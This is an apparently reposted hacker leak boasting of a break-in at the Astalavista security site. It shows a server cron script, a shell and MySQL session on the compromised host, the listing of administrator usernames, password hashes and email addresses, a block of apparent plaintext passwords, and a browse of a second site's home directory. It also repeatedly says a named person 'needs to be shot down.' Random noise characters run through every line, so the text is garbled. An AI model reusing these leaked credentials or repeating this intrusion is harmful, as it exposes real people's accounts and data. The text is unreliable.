<title>ASTALAVISTA.com - Exploits</title>
3 e7 U+ z# p: A- f' k% @ <link>http://www.astalavista.com/exploits</link>2 W9 }: i" B% f5 g. G, \5 y( T
<description>All availably Exploits.</description>
& P! z* z$ m: n' _$ t/ R) V <language>en-us</language>: x' `( `/ _: M: R
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>4 X, L5 P" U) g' S7 n. N
<docs>http://blogs.law.harvard.edu/tech/rss</docs>1 {' T$ T+ X& z
<generator>Astalavista.com</generator>* |5 p" T6 h' V1 G
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
0 v) I4 f X4 x% p" g </channel>
) h& j6 m4 A. @: T2 i6 s( o</rss>’;% `$ V2 h* R% Z7 Y$ @
. D! N1 e/ |' d4 f- Q- `% o if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {4 u( {0 L4 E5 O& T' [
unlink (FULLPATH . ‘/feed/exploits.xml’);9 ]% Q# d8 s, |
}
5 d E# q' }& ^0 y
* X+ V9 x+ Q% \ file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
: V, U& R5 ? X: ?$ Y[snip]
% J) N, N. l/ c* h# d# ]1 a! a
- B* Y! W I1 p8 n3 @# E" ush-3.2$ cat exploits.sh
% F+ L- U/ o, O0 D. m$ B0 u#!/bin/sh/ k1 w O+ {) r2 U
0 L' y# u/ _: n+ {# |###########################################################
: j# C) c3 B5 ~# n" Q, V3 y# #
8 ~, }, S5 o5 _/ R& N4 K# Title: milw0rm exploits adder #
: X6 ^& l7 Y+ R! \! A" Y# Description: Add all milw0rm exploits to the #
* m3 F& T( Y0 Z0 H( w# Astalavista.com database #0 e* x$ K A+ r
# #1 ] B% F$ h3 ^. Q- ^2 e$ V/ o
# Company: Astalavista Group #. S; s& m$ O( r# d6 m. v0 w
# Author: Paulo M. Santos #3 m" N4 T3 [% H. `9 L9 i7 p
# E-Mail: 链接标记paulo.santos@astalavista.ch #* C7 _. ^3 T; X6 |- B
# #
& V% B b- y ~/ ^3 L Z###########################################################
3 S" {' k( i7 A; b. g2 I' M% }8 `5 j6 r
# path
# x! s: n& E- }: |5 x0 l+ u$ J! wthis_path=/home/com/public_html/modifications/cronjobs9 z* z' d/ i" N' m/ f7 `) g
% S+ Z1 v0 ?1 `0 d# change directory
/ N2 a! I4 d& D) {cd $this_path
0 f# d# z2 }3 J N1 Lcd tmp/
6 x P3 s% j1 `6 d/ j2 p, s* u2 G1 H( R4 u+ u, W! M+ E
# delete files
j& O" }- x4 ~' Rrm -rf milw0rm.tar.* &. l, Q8 l9 N+ P* k
rm -rf milw0rm/ &/ h' U: e& d! [: k: n# {% X0 u: B
" h, R- m# m. \: R. L
# wget milw0rm paket
9 n' a7 A' ~3 c! h' k; Qwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url], W( _! E! z( n1 _- @" `
) X! x0 B @: a2 D+ Q: A
# extract milw0rm paket
6 N6 N6 S' F- t, ntar -xvf milw0rm.tar.bz2- V, H1 D0 @, F, ]
3 E$ X) q! A3 B7 p7 h
# change owner3 ^: j! P2 B/ G5 }0 x
chown -R com .0 n6 G" ]& Q" u2 p# v, z
chgrp -R com .
$ x' y( O9 b- S. a. B0 D4 W# \! R0 |
# execute php script% }1 W# }% D; D: ~3 L7 r* l, q: f5 A
cd $this_path! f! ?( }; k& `5 c
php -q exploits.php
1 f& H' n$ e6 ]1 u' C2 }0 A! H" f7 {5 P. o3 n
# delete files
3 S7 \$ _$ b6 }$ G4 R: L7 ^rm -rf tmp/milw0rm.tar.*( [( t$ D. {1 c' T) r
rm -rf tmp/milw0rm/
/ D. y3 p3 u' w/ l; V% ~/ `3 K* \0 T9 L* ]) C }/ y# I' h# { d! J% [
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
" w7 g0 a" r* O( mPaulo M. Santos needs to be shot down.
. [5 ]( n6 r& O u
* b5 v, W% k2 fmysql -u contrexxuser2 -p
( Q8 T3 v7 L( a3 _% ?Enter password:) z8 b4 b5 Q% @) m- ~. A
Welcome to the MySQL monitor. Commands end with ; or \g.$ V Q- L. c! ~2 E6 i, W: x# {
Your MySQL connection id is 261694$ |: s' A( \5 ^6 |2 ^; a
Server version: 5.0.45-community-log MySQL Community Edition (GPL): x$ Z7 c5 v# V: U$ S# ^5 q
6 O7 X$ C Z# k, `( Z3 mType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.7 |7 j9 g/ X4 N! g1 q
3 V: e& ?4 b6 r$ E6 c o6 Z
mysql> show databases;- a3 Y- f2 i2 ~' a$ k
+——————–+. M- C* P/ X1 K0 _, W3 f
| Database |
8 T% Y6 q* ^& I* s7 Q% m: U+——————–+! I i3 u- |6 A9 [$ R3 X( J" V! q
| information_schema |" p$ e( r; U; @: {+ C; A
| com_contrexx2 |
N2 v' ?2 K$ F2 q# |7 P* x5 N* o6 f/ T| com_contrexx2_live |* `$ \5 U( @8 U
| test |: G/ F, `" l( v2 r
+——————–+8 S2 u% S8 N& o1 ]* C, @1 | I9 z
4 rows in set (0.00 sec)% c% x7 r5 A3 L: X1 U- r# S" M' a
- ], Q1 k9 `" r
mysql> use com_contrexx2_live
9 X" D* p+ D- b# ?! x! WDatabase changed
' s1 K% U. P% A7 B( d+ Wmysql> show tables;7 V3 B; Q, U' B4 h, d
+————————————————–+
, } _$ c1 F2 C" f8 t6 l- y| Tables_in_com_contrexx2_live |
+ c1 m, w3 |+ X4 @+ b0 `& P+————————————————–+
! |9 c3 c& u" f, U, i| cc_banner_counter |
1 j1 d8 j& |) h* n0 N3 B| cc_search_counter |
6 r8 U7 N, E* W3 a| contrexx_access_group_dynamic_ids |0 G* r* h `+ B& @ Y
| contrexx_access_group_static_ids |2 k1 C& m+ }6 g% K
| contrexx_access_rel_user_group |
, M- l: h7 [# {7 z| contrexx_access_settings |
/ I/ V5 ?) T5 B2 @( P# ?, h| contrexx_access_user_attribute |+ M5 g8 Y( P" n; X! B- Y
| contrexx_access_user_attribute_name |
5 _! a- S& [. Y, u" b, C| contrexx_access_user_attribute_value |
! Y) q% c1 n: D% ~3 u| contrexx_access_user_core_attribute |
# @, a# `3 c; ?/ s| contrexx_access_user_groups |% g4 F, t7 o; x) C
| contrexx_access_user_mail |
0 d$ y( \7 i. }- l: j/ _. k# n| contrexx_access_user_profile |; z; T: B+ [0 \4 r6 ]: s
| contrexx_access_user_title |* c$ ?! Q4 r2 R
| contrexx_access_user_validity |7 \( z0 R$ l$ E( b
| contrexx_access_users |
7 t& X8 {6 B$ n' i6 P' g; V| contrexx_backend_areas |% A8 x$ A- s8 x# x
| contrexx_backups |
# y5 ~4 u$ Q, x0 S4 F| contrexx_content |; G7 `* E4 Y# c6 a7 N! a
| contrexx_content_history |: p" S" `- c K. W3 G( }! j
| contrexx_content_logfile |
/ D) e1 p$ J; R) F" j+ U| contrexx_content_navigation |
3 E% C. h# R5 i0 O| contrexx_content_navigation_history |
$ o! j' e9 a! l2 F/ N* M| contrexx_ids |% c* }% t4 x, j1 o0 V
| contrexx_languages |
) x) i" n/ Z. {| contrexx_lib_country |' Y& g% N' l1 ^3 {$ L/ ~4 Y6 o
| contrexx_log | G3 E( n! l# M, u$ d7 B
| contrexx_module_alias_source |5 a3 T8 R; z& P9 K
| contrexx_module_alias_target |( o) e2 w) \. t
| contrexx_module_block_blocks |
0 N5 O- w' z0 d| contrexx_module_block_rel_lang |/ g; |2 L; U n6 F
| contrexx_module_block_rel_pages |
6 E' k* i4 l8 T6 `7 Z: z| contrexx_module_block_settings |
$ r( I' a" t" H9 p| contrexx_module_blog_categories |
( h0 X: {* D! S0 | \| contrexx_module_blog_comments |% c3 h7 ]# W+ v# N. r9 l
| contrexx_module_blog_message_to_category |
! ^9 w- U0 z/ M8 F; D! z3 y" b| contrexx_module_blog_messages |
$ d, e3 w- Y3 p/ W8 \| contrexx_module_blog_messages_lang |* T% l0 s d# |5 c M
| contrexx_module_blog_networks |% o5 R$ }: C: ?3 L
| contrexx_module_blog_networks_lang |
1 C4 Z9 @+ X9 c; y- [| contrexx_module_blog_settings |
( b" n3 Q' C1 o' N7 N# H7 L| contrexx_module_blog_votes |
3 |2 W5 ?: L+ l k' N% y| contrexx_module_calendar |/ W$ H0 {& X# n! g2 p3 a4 P3 N9 k
| contrexx_module_calendar_access |. r Y( R, \# b* p c- t; K% Q
| contrexx_module_calendar_categories |+ J* H) x' q9 y8 l7 ^0 @3 o" `( O6 v k
| contrexx_module_calendar_form_data |
' I9 J. c7 d; b$ n. r6 P| contrexx_module_calendar_form_fields |( {& a* p% c9 d/ S4 ?, W/ q/ L
| contrexx_module_calendar_registrations |
1 x7 P0 F7 D$ \$ g| contrexx_module_calendar_settings |
3 S. p! f" W2 \2 E6 V| contrexx_module_calendar_style |+ ^0 X1 x9 s2 r! c
| contrexx_module_contact_form |
) J9 r( }3 u3 R1 || contrexx_module_contact_form_data |
a- D3 B# |9 r" f8 p9 J| contrexx_module_contact_form_field |) W, ]$ J& g0 z
| contrexx_module_contact_settings |. R" n7 W6 j* y* S4 f2 ~
| contrexx_module_data_categories |' H, U: v' F! U7 q
| contrexx_module_data_message_to_category |
( V" k2 T# d+ u, R7 V9 q# z3 ^| contrexx_module_data_messages |
' q1 u0 K9 j$ ]8 `| contrexx_module_data_messages_lang |
9 {* B- `$ ?1 b: H| contrexx_module_data_placeholders |
) [: \+ U, _: U1 S( I/ t, G$ a| contrexx_module_data_settings |# V1 a/ i0 F [
| contrexx_module_directory_access |
( K1 D+ ?6 P6 T5 M+ c| contrexx_module_directory_categories |) S9 ?3 }; B# V: p' i
| contrexx_module_directory_dir |! \4 j7 |; a& G
| contrexx_module_directory_inputfields |: k" \6 E$ M& }# }& h
| contrexx_module_directory_levels |( o+ J. `1 y% Q* [. P
| contrexx_module_directory_mail |4 E' K \8 F: j0 M/ w. a
| contrexx_module_directory_rel_dir_cat |
, a9 O( U/ z J: d+ z| contrexx_module_directory_rel_dir_level |/ R2 Y0 V8 e. F) `
| contrexx_module_directory_settings |
3 M- Y7 P% o1 h$ z| contrexx_module_directory_settings_google |
9 h+ n) F, w1 A& ?; q* g| contrexx_module_directory_vote |0 p0 s n# Y7 m3 c
| contrexx_module_docsys |
* X+ x5 {. X) T/ l! l| contrexx_module_docsys_categories |5 ^0 x& f, e, r1 N% z, i) q, G `
| contrexx_module_egov_configuration |
4 G/ W2 |4 Z! Q4 F4 ]) D; x| contrexx_module_egov_orders |6 M/ \5 q. B- {7 J/ z, ?
| contrexx_module_egov_product_calendar |; K5 w, {# [% P: X1 r. s+ }
| contrexx_module_egov_product_fields |7 }0 _# k/ Q9 p+ W
| contrexx_module_egov_products |. _" [3 I# B( v
| contrexx_module_egov_settings |
8 G/ J! U: y/ y5 g& x i| contrexx_module_exploits |
6 q! c3 e- x# J3 S# `, Z6 E| contrexx_module_exploits_categories |! s p6 E% |8 V* J8 k: b7 m" g
| contrexx_module_feed_category |7 g9 X- } o8 A# ?
| contrexx_module_feed_news |8 G0 N& B: R. |0 L; T9 u1 u3 r
| contrexx_module_feed_newsml_association |
) @1 d6 X1 R! `+ G; i| contrexx_module_feed_newsml_categories |3 F6 B U" Q% a; F2 H
| contrexx_module_feed_newsml_documents |3 s& e/ J ~& l/ M, z
| contrexx_module_feed_newsml_providers |
1 H" o0 O' k: I| contrexx_module_forum_access |
* s- o: L3 Y' R| contrexx_module_forum_categories |
. r0 S8 F1 m( I5 l; F" s| contrexx_module_forum_categories_lang |
) ~6 X0 ^7 @# p6 c- g0 |9 s| contrexx_module_forum_notification |* x: ?7 e4 q; K4 ^: P- e) m
| contrexx_module_forum_postings |' P4 u, I3 b0 e9 k$ s6 G( \' z$ v
| contrexx_module_forum_rating |* i. X( r8 s0 C B2 O
| contrexx_module_forum_settings |
; n4 l- z& a7 \' \| contrexx_module_forum_statistics |
, `" ?. a) u5 ~% Y% r| contrexx_module_gallery_categories |
4 j4 f1 Z- z: _| contrexx_module_gallery_comments |5 n. Z2 Q7 q# d6 x% m a. H
| contrexx_module_gallery_language |
% s6 X6 ?' I5 i2 d; ?+ z| contrexx_module_gallery_language_pics |/ Y7 E4 B) T8 f& s0 ^7 D3 V8 K
| contrexx_module_gallery_pictures |5 J# M# B$ P8 P1 Y$ n1 H
| contrexx_module_gallery_settings |8 K1 @4 n) \! |4 z
| contrexx_module_gallery_votes |
# r \ q5 M" ` p5 L% d| contrexx_module_guestbook |% N, i! B( f6 G( F8 P C( f1 |
| contrexx_module_guestbook_settings |# q8 g5 _9 W# u; e/ j
| contrexx_module_livecam |
( J- w" S2 Y8 m| contrexx_module_livecam_settings |
2 B, K5 E6 w" V$ [4 j; m: J5 C/ a| contrexx_module_market |& m/ o0 x* \+ s" u
| contrexx_module_market_access |9 K* {+ d$ }2 }$ x
| contrexx_module_market_categories |+ L1 ^" M* p8 Z( O$ R+ z: B
| contrexx_module_market_mail |3 _6 f# l! ?1 V. {8 s/ X8 `
| contrexx_module_market_paypal |* F4 K- M) Q5 m3 c' A2 X
| contrexx_module_market_settings |
9 t1 _7 U3 r5 N% a4 w: g| contrexx_module_market_spez_fields |
% o# `# q7 A1 j4 G( ]+ ?| contrexx_module_mediadir_access |4 N) k- n S! V! U! ~7 X% ~
| contrexx_module_mediadir_categories |
7 K: J6 D! }6 A| contrexx_module_mediadir_comments |! B( n. V3 k! e7 _2 _& a4 V Y
| contrexx_module_mediadir_dir |
6 y1 n2 t3 |( L5 C2 M% S9 M| contrexx_module_mediadir_inputfields |8 A! N2 e* J( y7 J
| contrexx_module_mediadir_levels |8 L4 x( }2 y4 z" G& ]
| contrexx_module_mediadir_mail |
* z# w7 W2 B- j! z+ q7 n| contrexx_module_mediadir_rel_dir_cat |
* {/ D3 \2 X& X3 B! w9 D! @7 ^6 J| contrexx_module_mediadir_rel_dir_level |
- D7 f( Z2 q! a9 U0 d# m4 q, q" F| contrexx_module_mediadir_reports |1 T: J% ]! L& i7 o6 k& ? j
| contrexx_module_mediadir_settings |
9 N: M- b& h8 N4 r* t* d1 ?| contrexx_module_mediadir_settings_google |
2 y" u7 g3 ]* d7 t j4 G4 M3 e. Q& w| contrexx_module_mediadir_vote |3 p7 ]+ h* O4 W" Z
| contrexx_module_memberdir_directories |
) z3 \' A* w4 y8 p: K; `0 F| contrexx_module_memberdir_name |; x+ U) k k) ^% H) U( A
| contrexx_module_memberdir_settings |/ I3 x1 a. ]/ V6 @
| contrexx_module_memberdir_values |
$ ~8 ~- U8 y0 l7 U| contrexx_module_nettools_allowed_groups |
0 `4 V& g9 V3 p0 F, l| contrexx_module_nettools_settings |. x! j1 s4 ]' o$ Q
| contrexx_module_news |
3 E5 f1 y( d% B| contrexx_module_news_access |- B) o, ]; e8 m9 Z% r/ }
| contrexx_module_news_categories |/ }* C" K$ b( ]7 h/ |/ t! e5 j( C
| contrexx_module_news_settings |
7 e8 T6 H- ~* |. y; o8 D" Q| contrexx_module_news_teaser_frame |8 o/ F6 o, `1 h+ [& Q; `/ v
| contrexx_module_news_teaser_frame_templates |
$ }7 w% \) K! e" u( C- e% }| contrexx_module_news_ticker |
: _ }( S8 v8 ]* f" y| contrexx_module_newsletter |
?% j6 x6 l' A1 L' m| contrexx_module_newsletter_attachment |
! Q7 o4 N3 w4 b: C& O| contrexx_module_newsletter_category |* D- Z& o8 D# T* p# x
| contrexx_module_newsletter_confirm_mail |
0 l6 S3 i" u, @/ O3 Y5 Z| contrexx_module_newsletter_rel_cat_news |
6 t) P2 X1 V# d1 f| contrexx_module_newsletter_rel_user_cat |& Z: y0 j/ ^: E
| contrexx_module_newsletter_settings |
, g$ H9 A: v! O* z$ @9 N| contrexx_module_newsletter_template |) U) d! T4 v& ? E! F
| contrexx_module_newsletter_tmp_sending |* }3 k& @ ~# L* B. t7 l
| contrexx_module_newsletter_user |5 k2 B1 L5 k7 e: I: s
| contrexx_module_newsletter_user_title |
9 c1 ?$ O+ A! {1 b" A( r| contrexx_module_onlinetools_defaultports |& W* j, I+ T- e' P f( w; H; e. z
| contrexx_module_onlinetools_defaultports_back |
, _, S* Q+ R! D. W| contrexx_module_onlinetools_geolitecity_blocks |9 ]& O' a# f, a B+ V l2 z
| contrexx_module_onlinetools_geolitecity_country |
; A% Y7 V% d' u! m5 \| contrexx_module_onlinetools_geolitecity_location |1 n: Q% W) c3 ?' Y( n( Y8 p; [+ {$ n
| contrexx_module_podcast_category |
; k2 J8 F) v. F- Z2 X| contrexx_module_podcast_medium |
- z, \ V6 P& H( I( ?, h# _# b+ A| contrexx_module_podcast_rel_category_lang |% V5 D0 {* q9 q" n r
| contrexx_module_podcast_rel_medium_category |
2 s$ d- \9 V1 V| contrexx_module_podcast_settings |, r: O/ C$ S3 m5 [
| contrexx_module_podcast_template |
" M9 b3 b; G3 R" O" w| contrexx_module_proxydb |
0 L H6 K1 M( V. c* a| contrexx_module_recommend |1 d1 G. D; |2 j, a
| contrexx_module_repository |
+ }; e6 G4 o0 G* f0 P% G| contrexx_module_securitynews_cats |9 F1 b9 y0 o" ]
| contrexx_module_securitynews_feeds |
) _! N7 H0 e9 Q1 e: G/ J: W| contrexx_module_securitynews_news |
% u+ C: d" {2 k| contrexx_module_shop_categories |# E0 c! E7 Y+ N* P
| contrexx_module_shop_config |
0 I9 z' G, ^" A% j/ H' J0 i| contrexx_module_shop_countries |1 X4 O$ R3 |" Q; D4 r
| contrexx_module_shop_currencies |
1 h& J. G( z$ G3 R. R2 r! D# r| contrexx_module_shop_customers |3 I7 {5 |. X6 t5 v9 c- B; K. |& B* `% x
| contrexx_module_shop_importimg |/ m; Q1 O( o/ }3 {/ h. U
| contrexx_module_shop_lsv |
3 }/ X* T0 x2 H3 H| contrexx_module_shop_mail |8 E4 H0 n0 E9 q$ [
| contrexx_module_shop_mail_content |) ~+ H, n5 ~6 ~6 W
| contrexx_module_shop_manufacturer |
1 Y; U- I) ]: J, O9 B2 z; k| contrexx_module_shop_order_items |: |# S( T7 c( j( M. q
| contrexx_module_shop_order_items_attributes |
`. K' I, H- l0 ?9 C/ s1 n| contrexx_module_shop_orders |
4 S# G Y8 j( @1 v# F| contrexx_module_shop_payment |
8 v9 g7 i/ b2 I| contrexx_module_shop_payment_processors |! l. E8 b2 G7 Y* t }+ w
| contrexx_module_shop_pricelists |
; ?+ G# t3 H) E$ H+ v* Y" y| contrexx_module_shop_products |9 ~- p/ I! c/ t1 Z
| contrexx_module_shop_products_attributes |
2 h9 j3 N! m& u8 I H3 R| contrexx_module_shop_products_attributes_name |
4 u; T- d# |8 G1 {, ^' Y/ u3 H| contrexx_module_shop_products_attributes_value |
, U8 I3 d; U8 A| contrexx_module_shop_products_downloads |
2 k* Y8 q/ v0 i2 [; n1 W) Y| contrexx_module_shop_rel_countries |
9 S/ b1 e) z' U% `# B6 @" s- [& O| contrexx_module_shop_rel_payment |
( G) O( M0 W4 _5 P2 X8 A6 x m| contrexx_module_shop_rel_shipment |
0 u* {1 {: n9 L| contrexx_module_shop_shipment_cost |
: A7 J6 e/ t0 @| contrexx_module_shop_shipper |2 c/ f& y- n3 h5 P. W3 V& W
| contrexx_module_shop_vat |
! _3 t0 _1 t) X| contrexx_module_shop_zones |
0 P2 c0 o- l! p8 K| contrexx_module_u2u_address_list |
. w2 C: Y! k8 |4 ^. u* r! L! m| contrexx_module_u2u_message_log |4 Z; R: c# W9 K/ }9 p
| contrexx_module_u2u_sent_messages |
$ R# v/ P8 D, w% ^+ \7 i1 S| contrexx_module_u2u_settings |
! n% Q; I4 A! f% Z- b- n7 ]4 j/ x| contrexx_module_u2u_user_log |- ^% l& `5 s$ k
| contrexx_modules |! {% e& Y6 a, G& l& T
| contrexx_sessions |
" M9 |, a2 E- u9 H% W$ t8 f3 `| contrexx_settings |
3 x+ J$ l+ l8 P/ w. v4 S- p& ^| contrexx_settings_smtp |
- K' P z7 c) z4 h2 I| contrexx_skins |$ }+ Q, ^0 W$ Q$ [% ]
| contrexx_stats_browser |
; R1 N9 D! I9 b+ j; q+ b| contrexx_stats_colourdepth |
/ W$ \# g$ ?# V/ h9 o| contrexx_stats_config |6 c) p' ]) z. Y( t8 c
| contrexx_stats_country |) }, A* i1 z% ]/ R
| contrexx_stats_hostname |- N- M; A( |4 Q9 }4 |. }
| contrexx_stats_javascript |
' [) [- x1 r8 x| contrexx_stats_operatingsystem |
. g1 e# o0 x" _+ ]1 ]| contrexx_stats_referer |( A8 |! d' c0 }9 e
| contrexx_stats_requests |
) ^- V) N* Q5 H R* d, n| contrexx_stats_requests_summary |* h: l4 k2 I0 z. v5 y
| contrexx_stats_screenresolution |8 O" G# v% ~7 m8 k1 `/ C+ u7 A. v0 C
| contrexx_stats_search |1 n2 E7 w3 a4 F
| contrexx_stats_spiders |' O+ A( r) n- L% C1 k+ z
| contrexx_stats_spiders_summary |- w! q {) Q0 d' g
| contrexx_stats_visitors |2 k, a5 [8 }* D1 K1 `
| contrexx_stats_visitors_summary |
! ]4 ?3 \3 D2 [| contrexx_voting_additionaldata |
8 x, h. ?$ _& i1 L| contrexx_voting_email |& b- s6 ^2 P9 r! d
| contrexx_voting_rel_email_system |0 P n1 Y) }: K. X
| contrexx_voting_results |
% q4 w3 N. g: n1 c/ @+ e7 c/ Q8 N| contrexx_voting_system |
' ]) K. J- K) z0 Q) J3 t2 m| foo |
* b P% h7 E1 V$ I) o+————————————————–+
% R/ ^! l8 o2 w* M227 rows in set (0.01 sec)) l' H, }+ O9 i$ M4 o! V) @5 H4 w
( k3 z) ^+ s8 ^! n7 q5 k0 {# T
mysql> select count(*) as skids from contrexx_access_users;9 x7 K* o$ f' i5 r/ a
+——-+
2 s) ^) z2 U; x5 f| skids |* A* `/ z e1 B- A- N( `9 `
+——-+
- ~( C' W( x* `7 A$ l) z| 53699 |
) {/ ~& e$ \" X: Q+——-+) X1 }# J1 s! |* U$ X- H8 u6 Y
1 row in set (0.00 sec)- P$ W0 I& j( C, z) H! i) \
2 L% E" l5 U# N( R7 imysql> describe contrexx_access_users;: s# }3 D& _- \1 X3 D
+——————+——————————————+——+—–+————–+—————-++ @/ @& A2 \8 j
| Field | Type | Null | Key | Default | Extra |
) K6 ?" u' s9 K U6 a, |; h0 O7 s( P+——————+——————————————+——+—–+————–+—————-+
E5 y0 b. A! S( g| id | int(10) unsigned | NO | PRI | NULL | auto_increment |! x k( d4 D2 K. c! Z, q
| is_admin | tinyint(1) unsigned | NO | | 0 | |+ j$ s! F7 s! h/ s& {+ c) w5 t
| username | varchar(40) | YES | MUL | NULL | |
, m: l4 \9 Y# w; b2 J| password | varchar(32) | YES | | NULL | |
, I( }. T! J* Q/ t! x3 u| regdate | int(14) unsigned | NO | | 0 | |1 a2 q) m0 h% j6 U2 }
| expiration | int(14) unsigned | NO | | 0 | |
3 C2 d. X: ], ~' s6 t| validity | int(10) unsigned | NO | | 0 | |
. m1 K4 ~- Z: || last_auth | int(14) unsigned | NO | | 0 | |
% B1 Q. P3 q# @7 M| last_activity | int(14) unsigned | NO | | 0 | |/ V2 ^' d, n- [9 N/ q, S
| email | varchar(255) | YES | | NULL | |! @4 p/ F2 c8 ~; ~
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |3 d; ^5 L% v1 o1 A7 T6 J5 e- H
| frontend_lang_id | int(2) unsigned | NO | | 0 | |6 p3 s+ N+ @6 B" m. v
| backend_lang_id | int(2) unsigned | NO | | 0 | |
6 b! t! U; U5 Y5 B' i| active | tinyint(1) | NO | | 0 | |
" k7 p! _% T$ l/ Y# z& M3 D| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
4 R' @' D; ?2 g. b3 v+ k. w0 V| restore_key | varchar(32) | NO | | | |4 H4 c1 ?6 _: L3 ^& Z, q
| restore_key_time | int(14) unsigned | NO | | 0 | |
; c- Y- G- t2 W1 s/ W| u2u_active | enum(’0′,’1′) | NO | | 1 | |% C) K7 |% L9 _7 j+ @
+——————+——————————————+——+—–+————–+—————-+
* ?' \5 v2 c% f6 R( V* T18 rows in set (0.00 sec)
1 E6 P; `* e; b4 Z
% ~1 A. X7 n; Z2 \mysql> select username,password,email from contrexx_access_users where is_admin = 1;
) B3 Y/ U% q8 X2 w% O+————+———————————-+—————————–+' |5 h; S/ w5 E" d" I/ R
| username | password | email |
- X. P- D. l- `4 R( Z2 j+————+———————————-+—————————–+
' d5 |$ Y9 x- E| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
) h( W& C- d5 f; Z8 R| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |4 z: a3 M8 b- Z5 \
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
& F1 f7 k: V/ o+ @| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
7 M6 ~1 s& R/ h' @2 q& B/ V5 a+————+———————————-+—————————–+ z- ~; B& \" D+ F3 V
4 rows in set (0.04 sec)
+ E& t L& r5 K% u$ \ c/ U& ~
6 G( C" Y# [9 B1 z1 [mysql> exit;! s% j9 t# C; k
Bye. P' P3 l! a% W! i7 p$ {
- c) j, S: Y2 ^! |& N4 E[~] There you go, your “team of security and IT professionals” is a joke.
7 w C3 H! ~/ L, D6 _+ N% [7 G
1 Q) ], I( m& i! a* A( {+——————————+
. V5 @- n' i3 ?3 y( ^1 Qsystem:f82BN3+_*
2 T! Q5 |6 T9 y6 Q* JBe1er0ph0r:belerophor4astacom8 ~& H, O$ A3 L7 `8 @- w
prozac:asta4cms!0 _' Y, v: u2 A5 h4 n% }# z
commander:mpbdaagf6m
7 @0 N" ^' {3 r5 J ssykadul:ak29eral9 m( `6 S6 }7 A/ o
+——————————+
( |8 y' R# [7 r5 k/ ]! `7 n5 Q' ]% a2 U( B! Y6 {
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s): V" M& \, s2 z% K {
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.6 y9 N% x) O4 Y6 T W; U0 }' b
1 N6 W* g' P& ~% I/ n
[~] Lets move to astalavista.net now,
, I- m- Y1 y- r( }/ \$ G' _; K2 a( a) T/ {# A7 t4 S$ k
From <链接标记[url]https://www.astalavista.net/[/url]>:5 O4 a$ e/ X( N" u$ H
>> Everyone knows that the best defense is a good offense.+ K6 i9 y/ t- e! @$ V* \
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
+ b& B/ }4 m$ m G; t7 f: w>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
, B* d' w$ |, ^8 }8 q' X# N>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.” a& M3 c5 G4 N( A4 C/ s+ D. p
6 Z5 C* w7 z) x( P5 W) O) k>> Go ahead, try and hack our server . in a completely legal way!) X" T% a* H: r/ S1 M9 P7 l3 C
>> Learn by doing: We offer our members tricky tasks and challenges on an9 d. b) T% C; j. m
>> ongoing basis so you can test your knowledge and abilities. You can also
8 S' d* T, W2 J" j>> demonstrate what you.ve mastered by taking part in regular hacker contests
; R$ {7 D3 u8 i2 s9 B>> and war games5 x# h, P7 M- X2 d8 z
# r) ]$ I$ H- Z* n# S `: `. B
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
+ J* q. Z8 x: m1 Q9 Q+ q" J7 N/ L) s! b5 y2 I
[-] Tricky task: Find home dir of astalavista.net
6 X; `9 v! y. Z+ h# d6 e$ ]; `
0 d8 d2 a7 A0 n' w p8 nsh-3.2$ ls -la ~astanet
' h; Q" m2 m6 {- B. H1 T+ F. qtotal 48
) |. L* G# G' C# mdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .- ~8 P: n ?6 Y, ~
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
7 N m8 n) w m1 v& Adrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth: n3 l: t4 J% X4 c6 y; a# M
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history" U5 c3 l* h" e
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout1 |- E/ m, z0 h6 K4 b
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
5 q# O* T6 F- I! L9 Z-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
: B8 _- o6 z- p( wdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains9 z3 ?: M8 i; D5 S6 V* J9 [
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
/ E3 |: s+ A( ?1 V/ Adrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail! d$ b8 U, _7 [; q
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html7 h2 U4 O+ T+ r7 L8 R
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
1 ~- v1 F4 s# F$ A) ^$ }+ _0 h' e$ k% T" E8 @8 d. q0 b0 F9 }; u
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
2 x9 A4 u0 D3 q& Ssh-3.2$ ls -la7 C$ \/ }" @: o
total 2001 k- N- a V1 o3 u# W
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
6 p2 v" u* `/ p2 C3 s+ ddrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
- x9 n4 e- L$ Ndrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
) A3 b K3 x. o! ^drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
$ C5 m4 b/ ?7 |9 P+ G' J6 idrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
